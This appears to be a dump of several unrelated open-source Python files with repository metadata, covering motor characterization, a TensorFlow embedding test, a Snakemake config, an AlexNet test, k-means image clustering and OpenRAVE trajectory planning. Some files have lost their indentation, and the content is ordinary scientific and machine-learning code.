def plotTwoAxes(x, y1, y2, xlabel="x", y1label="y1", y2label="y2"):
    """Plot two series against a shared x axis on twin y axes.

    The first series is drawn in red dots on the left axis, the second
    in blue dots on the right axis; tick labels are coloured to match.
    Returns the matplotlib figure.
    """
    def paint(axis, series, label, colour):
        # draw one series and colour its y-axis labels to match
        axis.plot(x, series, colour + '.')
        axis.set_ylabel(label, color=colour)
        for tick in axis.get_yticklabels():
            tick.set_color(colour)
    fig = figure()
    hold(True)
    left = fig.add_subplot(111)
    paint(left, y1, y1label, 'r')
    left.set_xlabel(xlabel)
    right = left.twinx()
    paint(right, y2, y2label, 'b')
    return fig
def DCAnalysis():
    """Steady-state sweep: drive the motor from -2.5 V to +2.5 V in 50
    steps, record voltage/current/speed, plot them on twin axes, fit the
    winding resistance and back-EMF constant, and return the raw samples."""
    # ensure "zero" point is where we want it to be
    cee.setOutputConstant('a', 'v', zero)
    # set reasonable timestep for steady state analysis
    dt = 0.2
    # set to max negative in light of future sampling
    cee.setOutputConstant('b', 'v', 0)
    data = []
    # go through len 50 list of voltages, get voltage, current, and rotational velocity for each voltage
    for v in linspace(-zero, zero, 50):
        data.append(getDCSample(v, dt))
    # cleanup
    v = array([d['v'] for d in data])
    i = array([d['i'] for d in data])
    dw = array([d['dw'] for d in data])
    f = figure()
    hold(True)
    ax1 = f.add_subplot(111)
    ax1.plot(v, dw, 'r.', label="dw/dt data (rps)")
    legend(loc="best")
    ax1.set_xlabel("voltage (v)")
    ax1.set_ylabel("rotations per second", color="r")
    for tl in ax1.get_yticklabels():
        tl.set_color('r')
    ax2 = ax1.twinx()
    ax2.plot(v, i, 'bo', label="measured current (mA)")
    ax2.set_ylabel("current draw (mA)", color="b")
    for tl in ax2.get_yticklabels():
        tl.set_color('b')
    # resistance is a least squares fit of voltage and current
    resistance = polyfit(v, i, 1)
    ax2.plot(v, polyval(resistance, v), '-', label="resistance fit")
    legend(loc='best')
    f.savefig("DCanalysis.png")
    print resistance[0], " ohms"
    i = -i
    # electrical constant as per the lab instructions
    k_e = polyfit(v - i*resistance[0], dw, 1)[0]
    print k_e, "rps per volt"
    # electrical constant as per my understanding
    k_e = polyfit(v, dw, 1)[0]
    print k_e, "rps per volt"
    legend(loc='best')
    return data
def ACAnalysis():
    """Transient (step-response) analysis: apply a 0->10 mA current step,
    record counters during the transient, then plot the measured signals
    and the spline-smoothed first/second derivatives of position."""
    # make sure zero is actually zero
    cee.setOutputConstant('a', 'v', zero)
    # total observable behavior should span 4 tau
    # tau is somewhat arbitrarily chosen constant for what seemed to ecapsulate the interesting parts
    tau = .25
    # value of 10, in this case, 10mA
    v = 10
    # calculate how many samples are contained in four timesteps
    sampleCt = int(4*tau/cee.devInfo['sampleTime'])
    # set a step from 0mA to 10mA to happen at tau/4, measure until 4tau
    # "ss" is the integer value of the starting sample
    ss = cee.setOutputArbitrary('b', 'i', [0, tau/4, tau/4, 4*tau], [0, 0, +v, +v], repeat=0)['startSample']
    # instantiate empty array
    data = []
    while True:
        # inner loop, simply call getCounters, shove the data into the array, break if the sample count is more than our target end point
        data.append(getCounters())
        datum = data[-1]
        if datum[1] > ss+sampleCt:
            break
    # get 'sampleCt' samples into lists "v" and "i" with no resampling, starting at the sample point the arbitrary waveform started
    (v, i) = cee.getInput('b', resample=0, count=sampleCt, start=ss)
    # normalize to "zero"
    v = array(v) - zero
    # generate array of "sampleCt" sample indexes
    s = arange(ss, sampleCt+ss)
    # "t" or ticks is the 2nd element in data
    t = [d[1] for d in data]
    # "w" or omega is the 1st element
    w = [d[0] for d in data]
    # plot motor voltage and current on the same plot
    plotTwoAxes(s, v, i, "samples", "voltage", "current").show()
    # generate an abbreviated set of times on the continuum from the first measured sample count to the last
    x_f = linspace(t[0], t[-1], 100)
    # fit a spline to our rotations over time data
    fit = UnivariateSpline(t, w)
    # show quality of fit
    figure()
    plot(x_f, fit(x_f), label="univariate spline fit")
    xlabel("time (samples)")
    ylabel("position")
    title("position over time")
    plot(t, w, '.', label="data")
    legend(loc="best")
    # use spline as low-jitter source of rotational data capable of being numerically integrated
    figure()
    plot(t[1::], diff(w)/diff(t), '.', label='numerically differentiated data')
    plot(x_f[1::], diff(fit(x_f))/diff(x_f), '-', label='derivative of interpolated and dt-normalized w')
    rpsps = diff(fit(x_f), 2)/(diff(x_f)[1::])
    semilogy(x_f[2::], rpsps, '-', label='second derivative of interpolated and dt-normalized w')
    xlabel("time (samples)")
    ylabel("data")
    legend(loc='best')
    show()
| [
"it.daniher@gmail.com"
] | it.daniher@gmail.com |
ae069441f2d4ce8ad54d7f0570cef537641659eb | 5dd190725aaaeb7287d935b3c99c20480b208816 | /object_detection/dataset_tools/context_rcnn/generate_embedding_data_tf2_test.py | a93e9eacd9bc9e9e98402f6d60446363b8b6c604 | [
"MIT"
] | permissive | DemonDamon/mask-detection-based-on-tf2odapi | 32d947164fb54395b9e45368c0d4bcf3a6ea1c28 | 192ae544169c1230c21141c033800aa1bd94e9b6 | refs/heads/main | 2023-05-13T05:05:44.534885 | 2021-06-08T05:56:09 | 2021-06-08T05:56:09 | 369,463,131 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,488 | py | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for generate_embedding_data."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import tempfile
import unittest
import numpy as np
import six
import tensorflow as tf
from object_detection import exporter_lib_v2
from object_detection.builders import model_builder
from object_detection.core import model
from object_detection.protos import pipeline_pb2
from object_detection.utils import tf_version
if tf_version.is_tf2():
from object_detection.dataset_tools.context_rcnn import generate_embedding_data # pylint:disable=g-import-not-at-top
if six.PY2:
import mock # pylint: disable=g-import-not-at-top
else:
mock = unittest.mock
try:
import apache_beam as beam # pylint:disable=g-import-not-at-top
except ModuleNotFoundError:
pass
class FakeModel(model.DetectionModel):
  """Minimal DetectionModel stub returning canned postprocessed outputs."""
  def __init__(self, conv_weight_scalar=1.0):
    super(FakeModel, self).__init__(num_classes=5)
    # Single 1x1 conv with constant weights so `predict` owns a variable
    # that can be checkpointed and restored.
    self._conv = tf.keras.layers.Conv2D(
        filters=1, kernel_size=1, strides=(1, 1), padding='valid',
        kernel_initializer=tf.keras.initializers.Constant(
            value=conv_weight_scalar))
  def preprocess(self, inputs):
    # Pass-through preprocessing; also report the true input shapes.
    return tf.identity(inputs), exporter_lib_v2.get_true_shapes(inputs)
  def predict(self, preprocessed_inputs, true_image_shapes):
    return {'image': self._conv(preprocessed_inputs)}
  def postprocess(self, prediction_dict, true_image_shapes):
    # Fixed fake detections: two boxes plus a constant detection_features
    # tensor whose embedding the pipeline under test will aggregate.
    with tf.control_dependencies(prediction_dict.values()):
      num_features = 100
      feature_dims = 10
      classifier_feature = np.ones(
          (2, feature_dims, feature_dims, num_features),
          dtype=np.float32).tolist()
      postprocessed_tensors = {
          'detection_boxes': tf.constant([[[0.0, 0.1, 0.5, 0.6],
                                           [0.5, 0.5, 0.8, 0.8]]], tf.float32),
          'detection_scores': tf.constant([[0.95, 0.6]], tf.float32),
          'detection_multiclass_scores': tf.constant([[[0.1, 0.7, 0.2],
                                                       [0.3, 0.1, 0.6]]],
                                                     tf.float32),
          'detection_classes': tf.constant([[0, 1]], tf.float32),
          'num_detections': tf.constant([2], tf.float32),
          'detection_features':
              tf.constant([classifier_feature],
                          tf.float32)
      }
    return postprocessed_tensors
  # The remaining DetectionModel abstract methods are irrelevant to these
  # tests and are stubbed out.
  def restore_map(self, checkpoint_path, fine_tune_checkpoint_type):
    pass
  def restore_from_objects(self, fine_tune_checkpoint_type):
    pass
  def loss(self, prediction_dict, true_image_shapes):
    pass
  def regularization_losses(self):
    pass
  def updates(self):
    pass
@contextlib.contextmanager
def InMemoryTFRecord(entries):
  """Yield the path of a temporary TFRecord file containing `entries`.

  Args:
    entries: iterable of serialized records to write.

  Yields:
    The temporary TFRecord filename; the file is deleted on exit.
  """
  temp = tempfile.NamedTemporaryFile(delete=False)
  filename = temp.name
  # Bug fix: close our handle immediately -- we only needed a unique path.
  # Keeping the descriptor open leaks it, and on Windows the open handle
  # would prevent TFRecordWriter from opening the same file.
  temp.close()
  try:
    with tf.io.TFRecordWriter(filename) as writer:
      for value in entries:
        writer.write(value)
    yield filename
  finally:
    os.unlink(filename)
@unittest.skipIf(tf_version.is_tf1(), 'Skipping TF2.X only test.')
class GenerateEmbeddingData(tf.test.TestCase):
  def _save_checkpoint_from_mock_model(self, checkpoint_path):
    """A function to save checkpoint from a fake Detection Model.
    Args:
      checkpoint_path: Path to save checkpoint from Fake model.
    """
    mock_model = FakeModel()
    # Run one forward pass so the model's variables are created before
    # checkpointing.
    fake_image = tf.zeros(shape=[1, 10, 10, 3], dtype=tf.float32)
    preprocessed_inputs, true_image_shapes = mock_model.preprocess(fake_image)
    predictions = mock_model.predict(preprocessed_inputs, true_image_shapes)
    mock_model.postprocess(predictions, true_image_shapes)
    ckpt = tf.train.Checkpoint(model=mock_model)
    exported_checkpoint_manager = tf.train.CheckpointManager(
        ckpt, checkpoint_path, max_to_keep=1)
    exported_checkpoint_manager.save(checkpoint_number=0)
  def _export_saved_model(self):
    """Saves a FakeModel checkpoint and exports it as a SavedModel.
    Returns:
      Path to the exported saved_model directory.
    """
    tmp_dir = self.get_temp_dir()
    self._save_checkpoint_from_mock_model(tmp_dir)
    output_directory = os.path.join(tmp_dir, 'output')
    saved_model_path = os.path.join(output_directory, 'saved_model')
    tf.io.gfile.makedirs(output_directory)
    with mock.patch.object(
        model_builder, 'build', autospec=True) as mock_builder:
      # Patch the model builder so the exporter builds our FakeModel
      # instead of parsing a real pipeline config.
      mock_builder.return_value = FakeModel()
      exporter_lib_v2.INPUT_BUILDER_UTIL_MAP['model_build'] = mock_builder
      output_directory = os.path.join(tmp_dir, 'output')
      pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
      exporter_lib_v2.export_inference_graph(
          input_type='tf_example',
          pipeline_config=pipeline_config,
          trained_checkpoint_dir=tmp_dir,
          output_directory=output_directory)
      saved_model_path = os.path.join(output_directory, 'saved_model')
      return saved_model_path
  def _create_tf_example(self):
    """Builds one serialized tf.train.Example with an image + annotations."""
    encoded_image = tf.io.encode_jpeg(
        tf.constant(np.ones((4, 4, 3)).astype(np.uint8))).numpy()
    # Small helpers wrapping scalar values as tf.train.Feature protos.
    def BytesFeature(value):
      return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
    def Int64Feature(value):
      return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
    def FloatFeature(value):
      return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))
    example = tf.train.Example(
        features=tf.train.Features(
            feature={
                'image/encoded': BytesFeature(encoded_image),
                'image/source_id': BytesFeature(b'image_id'),
                'image/height': Int64Feature(400),
                'image/width': Int64Feature(600),
                'image/class/label': Int64Feature(5),
                'image/class/text': BytesFeature(b'hyena'),
                'image/object/bbox/xmin': FloatFeature(0.1),
                'image/object/bbox/xmax': FloatFeature(0.6),
                'image/object/bbox/ymin': FloatFeature(0.0),
                'image/object/bbox/ymax': FloatFeature(0.5),
                'image/object/class/score': FloatFeature(0.95),
                'image/object/class/label': Int64Feature(5),
                'image/object/class/text': BytesFeature(b'hyena'),
                'image/date_captured': BytesFeature(b'2019-10-20 12:12:12')
            }))
    return example.SerializeToString()
def assert_expected_example(self, example, topk=False, botk=False):
# Check embeddings
if topk or botk:
self.assertEqual(len(
example.features.feature['image/embedding'].float_list.value),
218)
self.assertAllEqual(
example.features.feature['image/embedding_count'].int64_list.value,
[2])
else:
self.assertEqual(len(
example.features.feature['image/embedding'].float_list.value),
109)
self.assertAllEqual(
example.features.feature['image/embedding_count'].int64_list.value,
[1])
self.assertAllEqual(
example.features.feature['image/embedding_length'].int64_list.value,
[109])
# Check annotations
self.assertAllClose(
example.features.feature['image/object/bbox/ymin'].float_list.value,
[0.0])
self.assertAllClose(
example.features.feature['image/object/bbox/xmin'].float_list.value,
[0.1])
self.assertAllClose(
example.features.feature['image/object/bbox/ymax'].float_list.value,
[0.5])
self.assertAllClose(
example.features.feature['image/object/bbox/xmax'].float_list.value,
[0.6])
self.assertAllClose(
example.features.feature['image/object/class/score']
.float_list.value, [0.95])
self.assertAllClose(
example.features.feature['image/object/class/label']
.int64_list.value, [5])
self.assertAllEqual(
example.features.feature['image/object/class/text']
.bytes_list.value, [b'hyena'])
self.assertAllClose(
example.features.feature['image/class/label']
.int64_list.value, [5])
self.assertAllEqual(
example.features.feature['image/class/text']
.bytes_list.value, [b'hyena'])
# Check other essential attributes.
self.assertAllEqual(
example.features.feature['image/height'].int64_list.value, [400])
self.assertAllEqual(
example.features.feature['image/width'].int64_list.value, [600])
self.assertAllEqual(
example.features.feature['image/source_id'].bytes_list.value,
[b'image_id'])
self.assertTrue(
example.features.feature['image/encoded'].bytes_list.value)
def test_generate_embedding_data_fn(self):
saved_model_path = self._export_saved_model()
top_k_embedding_count = 1
bottom_k_embedding_count = 0
inference_fn = generate_embedding_data.GenerateEmbeddingDataFn(
saved_model_path, top_k_embedding_count, bottom_k_embedding_count)
inference_fn.setup()
generated_example = self._create_tf_example()
self.assertAllEqual(tf.train.Example.FromString(
generated_example).features.feature['image/object/class/label']
.int64_list.value, [5])
self.assertAllEqual(tf.train.Example.FromString(
generated_example).features.feature['image/object/class/text']
.bytes_list.value, [b'hyena'])
output = inference_fn.process(('dummy_key', generated_example))
output_example = output[0][1]
self.assert_expected_example(output_example)
def test_generate_embedding_data_with_top_k_boxes(self):
saved_model_path = self._export_saved_model()
top_k_embedding_count = 2
bottom_k_embedding_count = 0
inference_fn = generate_embedding_data.GenerateEmbeddingDataFn(
saved_model_path, top_k_embedding_count, bottom_k_embedding_count)
inference_fn.setup()
generated_example = self._create_tf_example()
self.assertAllEqual(
tf.train.Example.FromString(generated_example).features
.feature['image/object/class/label'].int64_list.value, [5])
self.assertAllEqual(
tf.train.Example.FromString(generated_example).features
.feature['image/object/class/text'].bytes_list.value, [b'hyena'])
output = inference_fn.process(('dummy_key', generated_example))
output_example = output[0][1]
self.assert_expected_example(output_example, topk=True)
def test_generate_embedding_data_with_bottom_k_boxes(self):
saved_model_path = self._export_saved_model()
top_k_embedding_count = 0
bottom_k_embedding_count = 2
inference_fn = generate_embedding_data.GenerateEmbeddingDataFn(
saved_model_path, top_k_embedding_count, bottom_k_embedding_count)
inference_fn.setup()
generated_example = self._create_tf_example()
self.assertAllEqual(
tf.train.Example.FromString(generated_example).features
.feature['image/object/class/label'].int64_list.value, [5])
self.assertAllEqual(
tf.train.Example.FromString(generated_example).features
.feature['image/object/class/text'].bytes_list.value, [b'hyena'])
output = inference_fn.process(('dummy_key', generated_example))
output_example = output[0][1]
self.assert_expected_example(output_example, botk=True)
def test_beam_pipeline(self):
with InMemoryTFRecord([self._create_tf_example()]) as input_tfrecord:
temp_dir = tempfile.mkdtemp(dir=os.environ.get('TEST_TMPDIR'))
output_tfrecord = os.path.join(temp_dir, 'output_tfrecord')
saved_model_path = self._export_saved_model()
top_k_embedding_count = 1
bottom_k_embedding_count = 0
num_shards = 1
embedding_type = 'final_box_features'
pipeline_options = beam.options.pipeline_options.PipelineOptions(
runner='DirectRunner')
p = beam.Pipeline(options=pipeline_options)
generate_embedding_data.construct_pipeline(
p, input_tfrecord, output_tfrecord, saved_model_path,
top_k_embedding_count, bottom_k_embedding_count, num_shards,
embedding_type)
p.run()
filenames = tf.io.gfile.glob(
output_tfrecord + '-?????-of-?????')
actual_output = []
record_iterator = tf.data.TFRecordDataset(
tf.convert_to_tensor(filenames)).as_numpy_iterator()
for record in record_iterator:
actual_output.append(record)
self.assertEqual(len(actual_output), 1)
self.assert_expected_example(tf.train.Example.FromString(
actual_output[0]))
if __name__ == '__main__':
tf.test.main()
| [
"noreply@github.com"
] | DemonDamon.noreply@github.com |
b548b9f7cdadb399f27f06b74930780a08061e79 | 05d5945350fe64f6c1235d4f12ee22323167ca0c | /snakemake/configs/mm10_SRP044873.py | d77054f2e20301267d8ba829038dad7ea369643b | [
"BSD-2-Clause"
] | permissive | saketkc/re-ribo-smk | 674d4423830bbae3a32f46146ffd362514047a60 | c9326cbafdfa060e22e9af692d9146c37f5035ba | refs/heads/master | 2021-07-12T18:46:37.772947 | 2020-05-30T01:41:13 | 2020-05-30T01:41:13 | 148,952,525 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,542 | py | RAWDATA_DIR = '/staging/as/skchoudh/re-ribo-datasets/mm10/SRP044873'
OUT_DIR = '/staging/as/skchoudh/re-ribo-analysis/mm10/SRP044873'
GENOME_FASTA = '/home/cmb-06/as/skchoudh/genomes/mm10/fasta/Mus_musculus.GRCm38.dna.primary_assembly.fa'
CHROM_SIZES = '/home/cmb-06/as/skchoudh/genomes/mm10/fasta/Mus_musculus.GRCm38.dna.primary_assembly.sizes'
STAR_INDEX = '/home/cmb-06/as/skchoudh/genomes/mm10/star_annotated_ribopod'
GTF_VERSION = 'v96'
GTF = '/home/cmb-06/as/skchoudh/genomes/mm10/annotation/Mus_musculus.GRCm38.96.chr_patch_hapl_scaff.gtf'
GENE_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/gene.bed.gz'
STAR_CODON_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/start_codon.bed.gz'
STOP_CODON_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/stop_codon.bed.gz'
CDS_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/cds.bed.gz'
UTR5_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/utr5.bed.gz'
UTR3_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/utr3.bed.gz'
INTRON_BED = '/home/cmb-06/as/skchoudh/github_projects/riboraptor/riboraptor/annotation/mm10/v96/intron.bed.gz'
ORIENTATIONS = ['5prime', '3prime']
STRANDS = ['pos', 'neg', 'combined']
FRAGMENT_LENGTHS = range(18, 39)
RIBOTRICER_ANNOTATION_PREFIX = '/home/cmb-06/as/skchoudh/genomes/mm10/ribotricer_v96_annotation_longest'
| [
"saketkc@gmail.com"
] | saketkc@gmail.com |
e73bd41c33e69aa417fab4dffaa549a7814efb51 | 9a73c54526082c27e5c5d88bd54950a589233658 | /DeepLearning/Verification_code_identification/nets/alexnet_test.py | f0dc38b9c9f6f80166eb10b496695e7ac63d676d | [
"Apache-2.0"
] | permissive | archu2020/python-2 | af78b65ed7f3ad17f71d4f8a97c002df86908298 | 19c626ca9fd37168db8a7ac075fd80c8e2971313 | refs/heads/master | 2022-12-27T12:08:44.316760 | 2020-10-02T15:46:27 | 2020-10-02T15:46:27 | 300,660,839 | 0 | 0 | Apache-2.0 | 2020-10-02T15:46:28 | 2020-10-02T15:37:58 | Python | UTF-8 | Python | false | false | 5,964 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for slim.nets.alexnet."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from nets import alexnet
slim = tf.contrib.slim
class AlexnetV2Test(tf.test.TestCase):
def testBuild(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(inputs, num_classes)
self.assertEquals(logits.op.name, 'alexnet_v2/fc8/squeezed')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
def testFullyConvolutional(self):
batch_size = 1
height, width = 300, 400
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(inputs, num_classes, spatial_squeeze=False)
self.assertEquals(logits.op.name, 'alexnet_v2/fc8/BiasAdd')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, 4, 7, num_classes])
def testEndPoints(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
_, end_points = alexnet.alexnet_v2(inputs, num_classes)
expected_names = ['alexnet_v2/conv1',
'alexnet_v2/pool1',
'alexnet_v2/conv2',
'alexnet_v2/pool2',
'alexnet_v2/conv3',
'alexnet_v2/conv4',
'alexnet_v2/conv5',
'alexnet_v2/pool5',
'alexnet_v2/fc6',
'alexnet_v2/fc7',
'alexnet_v2/fc8'
]
self.assertSetEqual(set(end_points.keys()), set(expected_names))
def testModelVariables(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
alexnet.alexnet_v2(inputs, num_classes)
expected_names = ['alexnet_v2/conv1/weights',
'alexnet_v2/conv1/biases',
'alexnet_v2/conv2/weights',
'alexnet_v2/conv2/biases',
'alexnet_v2/conv3/weights',
'alexnet_v2/conv3/biases',
'alexnet_v2/conv4/weights',
'alexnet_v2/conv4/biases',
'alexnet_v2/conv5/weights',
'alexnet_v2/conv5/biases',
'alexnet_v2/fc6/weights',
'alexnet_v2/fc6/biases',
'alexnet_v2/fc7/weights',
'alexnet_v2/fc7/biases',
'alexnet_v2/fc8/weights',
'alexnet_v2/fc8/biases',
]
model_variables = [v.op.name for v in slim.get_model_variables()]
self.assertSetEqual(set(model_variables), set(expected_names))
def testEvaluation(self):
batch_size = 2
height, width = 224, 224
num_classes = 1000
with self.test_session():
eval_inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(eval_inputs, is_training=False)
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
predictions = tf.argmax(logits, 1)
self.assertListEqual(predictions.get_shape().as_list(), [batch_size])
def testTrainEvalWithReuse(self):
train_batch_size = 2
eval_batch_size = 1
train_height, train_width = 224, 224
eval_height, eval_width = 300, 400
num_classes = 1000
with self.test_session():
train_inputs = tf.random_uniform(
(train_batch_size, train_height, train_width, 3))
logits, _ = alexnet.alexnet_v2(train_inputs)
self.assertListEqual(logits.get_shape().as_list(),
[train_batch_size, num_classes])
tf.get_variable_scope().reuse_variables()
eval_inputs = tf.random_uniform(
(eval_batch_size, eval_height, eval_width, 3))
logits, _ = alexnet.alexnet_v2(eval_inputs, is_training=False,
spatial_squeeze=False)
self.assertListEqual(logits.get_shape().as_list(),
[eval_batch_size, 4, 7, num_classes])
logits = tf.reduce_mean(logits, [1, 2])
predictions = tf.argmax(logits, 1)
self.assertEquals(predictions.get_shape().as_list(), [eval_batch_size])
def testForward(self):
batch_size = 1
height, width = 224, 224
with self.test_session() as sess:
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = alexnet.alexnet_v2(inputs)
sess.run(tf.global_variables_initializer())
output = sess.run(logits)
self.assertTrue(output.any())
if __name__ == '__main__':
tf.test.main()
| [
"767786685@qq.com"
] | 767786685@qq.com |
6a4c0e5527f69fcc427eb1363b72c582e7260e58 | 4adbc552e5f442f9b6f0a36c33bbac2966dbc830 | /K_means.py | ed92ba2d74df6d67004810108b839956ccd49700 | [] | no_license | ashenafin/Plant_health_indication- | b4241800abe0c9c974ff2af4b917d11198b1cd2d | dd47d4f4c27577b5f1cd1a3df57e1929dbd2f0d4 | refs/heads/master | 2020-04-10T05:34:47.888342 | 2018-12-25T12:56:30 | 2018-12-25T12:56:30 | 160,831,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,155 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 19 23:03:21 2018
@author: Ashe
"""
import numpy as np
import cv2
def main():
path = "C:\\Users\\Ashe\\Desktop\\Books\\Semester project\\min\\"
imgpath = path + "1.13.jpg"
img = cv2.imread(imgpath,1)
r = 512.0 / img.shape[1]
dim = (512, int(img.shape[0] * r))
img = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)
#img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
z=img.reshape((-1,3))
z=np.float32(z)
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
k=3
ret, lebel, center = cv2.kmeans(z, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
center = np.uint8(center)
res = center[lebel.flatten()]
output = res.reshape((img.shape))
cv2.imwrite("C:\\Users\\Ashe\\Desktop\\Books\\Semester project\\min\\k_mean.tiff", output)
for i in range(1):
cv2.imshow('clusterd', output)
cv2.waitKey(0)
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | ashenafin.noreply@github.com |
cdd6442d846d0f5fbf1100ba2bf46fbc14addba5 | 02a95abdce2e7842c1280af9792fdaf030182836 | /task_breakdown_openrave/human_robot_test.py | 6d01159c9daeca557b68f9b0d9a500c2cbc63bb8 | [] | no_license | Anto09/task_breakdown_openrave | 270531a2dd0f460e80603b1b09ccd09cb3cdf00e | 2ab820ce7a3c5e47ffd336124f52c6a4d40f84bc | refs/heads/master | 2020-09-03T01:47:10.017260 | 2019-11-04T17:56:36 | 2019-11-04T17:56:36 | 219,354,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,501 | py | #!/usr/bin/env python
import sys
import os
import rospy
from baxter_moveit_test.srv import *
import time
import threading
import openravepy
#### YOUR IMPORTS GO HERE ####
import sys
from taskbreakdown_python import *
from utilities import Utilities
import math
import trajoptpy
import trajoptpy.kin_utils as ku
#### END OF YOUR IMPORTS ####
from openravepy import ikfast
if not __openravepy_build_doc__:
from openravepy import *
from numpy import *
from openravepy.misc import InitOpenRAVELogging
import geometry_msgs.msg
from geometry_msgs.msg import *
import transformations
import numpy as np
from utilities import Utilities
from human_robot import HumanRobot
from costwrapper import *
import TransformMatrix
import numpy as np
import math
import copy
import sys
from human_trajopt import HumanTrajopt
MAX_VAL = 180
class CostRegion:
dim = 7
vertices = np.zeros(shape=(7,2))
center = np.zeros(7)
cost = np.zeros(7)
total_cost = 0
def init(self, vertices):
self.vertices = vertices
def calc_center(self):
for d in range(0, self.dim):
self.center[d] = (self.vertices[d][1] + self.vertices[d][0])*0.5
def get_dist_center(self, config):
return np.linalg.norm(config - self.center)
def get_dist_boundary(self, config):
dist = 0;
for c in range(0,self.dim):
dist = min(min(np.fabs(self.vertices[c][0] - config[c]), np.fabs(self.vertices[c][1] - config[c])), dist)
return dist
def set_cost(self, c1, c2, c3, c4, c5, c6, c7):
self.cost[0] = c1
self.cost[1] = c2
self.cost[2] = c3
self.cost[3] = c4
self.cost[4] = c5
self.cost[5] = c6
self.cost[6] = c7
self.total_cost = np.sum(self.cost)
def inside_region(self, config):
inside = True
for i in range(0, self.dim):
inside = inside and config[i] >= self.vertices[i][0] and config[i] <= self.vertices[i][1]
return inside
def is_neighbor(self, cost_region):
neighbor = True
for i in range(0, self.dim):
c_dist = np.fabs(self.center[i] - cost_region.center[i])
extents_a = np.fabs(self.vertices[i][0] - self.vertices[i][1]) * 0.5
extents_b = np.fabs(cost_region.vertices[i][0] - cost_region.vertices[i][1]) * 0.5
neighbor = neighbor and np.fabs((extents_b + extents_a) - c_dist) > sys.float_info.epsilon
return neighbor
def str2num(string):
return array([float(s) for s in string.split()])
def generate_ik_solver(robotfile, filename):
# for generating ik solver
env = Environment()
kinbody = env.ReadRobotXMLFile(robotfile)
env.Add(kinbody)
solver = ikfast.IKFastSolver(kinbody=kinbody)
chaintree = solver.generateIkSolver(baselink=0,eelink=16,freeindices=[5],solvefn=ikfast.IKFastSolver.solveFullIK_6D)
code = solver.writeIkSolver(chaintree)
open(filename,'w').write(code)
def make_fullbody_request(end_t, n_steps, manip_name, end_joint_target):
coll_coeff = 20
dist_pen = .05
d = {
"basic_info" : {
"n_steps" : n_steps,
"manip" : manip_name,
"start_fixed" : True
},
"costs" : [
{
"type" : "joint_vel",
"params": {"coeffs" : [1]}
},
{
"name" : "cont_coll",
"type" : "collision",
"params" : {"coeffs" : [coll_coeff],"dist_pen" : [dist_pen], "continuous":True}
},
{
"name": "disc_coll",
"type" : "collision",
"params" : {"coeffs" : [coll_coeff],"dist_pen" : [dist_pen], "continuous":False}
}
],
"constraints" : [
{
"type" : "pose",
"params" : {"xyz" : end_t[0:3,3].tolist(),
"wxyz" : transformations.quaternion_from_matrix(end_t[0:3,0:3]).tolist(),
"link": "Head",
"timestep" : n_steps-1
}
}
],
"init_info" : {
"type" : "straight_line",
"endpoint" : end_joint_target.tolist()
}
}
return d
def ExtendTrajoptRequest(request, waypoints):
idx = 1
for waypoint in waypoints:
print 'waypoint rot target', transformations.quaternion_from_matrix(waypoint[0:3,0:3]).tolist()
request["constraints"].extend([
{
"type":"pose",
"name":"path_pose_waypoint",
"params":{
"xyz": waypoint[0:3,3].tolist(),
"wxyz": transformations.quaternion_from_matrix(waypoint[0:3,0:3]).tolist(),
"link": "Head",
"timestep": idx
}
}
])
idx += 1
